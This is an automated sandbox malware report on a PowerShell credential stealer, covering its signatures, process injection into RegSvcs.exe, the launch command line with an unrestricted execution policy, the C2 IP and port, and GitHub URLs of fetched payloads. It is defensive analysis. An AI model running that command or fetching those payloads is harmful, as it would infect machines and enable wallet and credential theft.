Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
62.122.184.98 (2).ps1

Overview

General Information

Sample name:62.122.184.98 (2).ps1
Analysis ID:1591130
MD5:e2532dd0f68b37aedc1221fb6c805fdd
SHA1:5731ac07a4d04f30f9fdea33d9240a84a324576c
SHA256:2fbeb35402b8e7d05d2d1265de6b4645878698193024fa2c8e8e5ad86fb637e4
Tags:62-122-184-98ps1user-JAMESWT_MHT
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Tries to harvest and steal Bitcoin Wallet information
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • powershell.exe (PID: 7428 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\62.122.184.98 (2).ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7648 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.3802429612.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Process Memory Space: RegSvcs.exe PID: 7648JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\62.122.184.98 (2).ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\62.122.184.98 (2).ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\62.122.184.98 (2).ps1", ProcessId: 7428, ProcessName: powershell.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\62.122.184.98 (2).ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\62.122.184.98 (2).ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\62.122.184.98 (2).ps1", ProcessId: 7428, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-14T18:01:15.220753+010020355951Domain Observed Used for C2 Detected62.122.184.9856001192.168.2.949775TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 62.122.184.98 (2).ps1ReversingLabs: Detection: 13%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1385043036.0000018041B93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1416991666.0000018059A60000.00000004.08000000.00040000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 62.122.184.98:56001 -> 192.168.2.9:49775
      Source: global trafficTCP traffic: 192.168.2.9:49775 -> 62.122.184.98:56001
      Source: global trafficTCP traffic: 192.168.2.9:53846 -> 162.159.36.2:53
      Source: Joe Sandbox ViewASN Name: GORSET-ASRU GORSET-ASRU
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: unknownTCP traffic detected without corresponding DNS query: 62.122.184.98
      Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
      Source: RegSvcs.exe, 00000003.00000002.3798554954.000000000103B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
      Source: RegSvcs.exe, 00000003.00000002.3815304999.0000000005750000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3798554954.000000000103B000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.3.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: powershell.exe, 00000000.00000002.1385043036.00000180433F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1406063961.0000018051A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000000.00000002.1385043036.000001804327F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1385043036.00000180431AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000000.00000002.1385043036.00000180417F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3802429612.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000000.00000002.1385043036.00000180431AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: powershell.exe, 00000000.00000002.1385043036.000001804327F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1385043036.00000180431AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.1385043036.00000180417F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000000.00000002.1406063961.0000018051A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000000.00000002.1406063961.0000018051A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000000.00000002.1406063961.0000018051A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: RegSvcs.exe, 00000003.00000002.3802429612.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
      Source: RegSvcs.exe, 00000003.00000002.3802429612.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
      Source: RegSvcs.exe, 00000003.00000002.3802429612.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
      Source: powershell.exe, 00000000.00000002.1385043036.000001804327F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1385043036.00000180431AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.1385043036.00000180427AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.1385043036.00000180433F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1406063961.0000018051A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000000.00000002.1385043036.00000180431AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
      Source: powershell.exe, 00000000.00000002.1385043036.00000180431AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
      Source: RegSvcs.exe, 00000003.00000002.3802429612.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
      Source: RegSvcs.exe, 00000003.00000002.3802429612.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
      Source: RegSvcs.exe, 00000003.00000002.3802429612.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8879FA5990_2_00007FF8879FA599
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8879F4A800_2_00007FF8879F4A80
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887AC0FA40_2_00007FF887AC0FA4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_013422F83_2_013422F8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01344F003_2_01344F00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01341F983_2_01341F98
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0134137F3_2_0134137F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_013422E93_2_013422E9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_013477303_2_01347730
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_013477173_2_01347717
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01341F883_2_01341F88
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02D762603_2_02D76260
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02D724E63_2_02D724E6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02D785A83_2_02D785A8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02D732A83_2_02D732A8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02D7C6803_2_02D7C680
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_055BD7403_2_055BD740
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_055B18103_2_055B1810
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_055B29E03_2_055B29E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_055D9F703_2_055D9F70
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_055D9F603_2_055D9F60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_055DD9483_2_055DD948
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_055DD9373_2_055DD937
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_055D63403_2_055D6340
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_055D4A483_2_055D4A48
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_055DBA183_2_055DBA18
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_055DBA283_2_055DBA28
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_055D62BB3_2_055D62BB
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05605F283_2_05605F28
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_056067F83_2_056067F8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05605BE03_2_05605BE0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0560BA9E3_2_0560BA9E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0560B5563_2_0560B556
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0560B55F3_2_0560B55F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0560B64A3_2_0560B64A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0560907F3_2_0560907F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_056000403_2_05600040
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0560BB603_2_0560BB60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0560BAA73_2_0560BAA7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_056097603_2_05609760
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_056097503_2_05609750
      Source: classification engineClassification label: mal92.spyw.evad.winPS1@4/7@1/1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\853d825e30f1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_guxte5wm.jrw.ps1Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: 62.122.184.98 (2).ps1ReversingLabs: Detection: 13%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\62.122.184.98 (2).ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1385043036.0000018041B93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1416991666.0000018059A60000.00000004.08000000.00040000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8879FF07C pushad ; retf 0_2_00007FF8879FF07D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8879FD86C pushad ; retf 0_2_00007FF8879FD883
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8879F3F2B push esi; ret 0_2_00007FF8879F3F3A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8879FCED3 pushad ; ret 0_2_00007FF8879FCED9
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8879FBE0D push 98B84801h; ret 0_2_00007FF8879FBE15
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8879FB58F push 98B94901h; ret 0_2_00007FF8879FB59D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8879FB3EA push ebx; ret 0_2_00007FF8879FB3EB
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8879F09CA push E85E075Dh; ret 0_2_00007FF8879F09F9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02D71AD8 push 8B03FD23h; iretd 3_2_02D71ADD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_055B9470 pushfd ; retf 3_2_055B9471
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_055B9402 push eax; retf 3_2_055B9409
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_055D7179 push 20055C6Eh; retf 3_2_055D7185
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05600928 push eax; retf 3_2_05600929
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
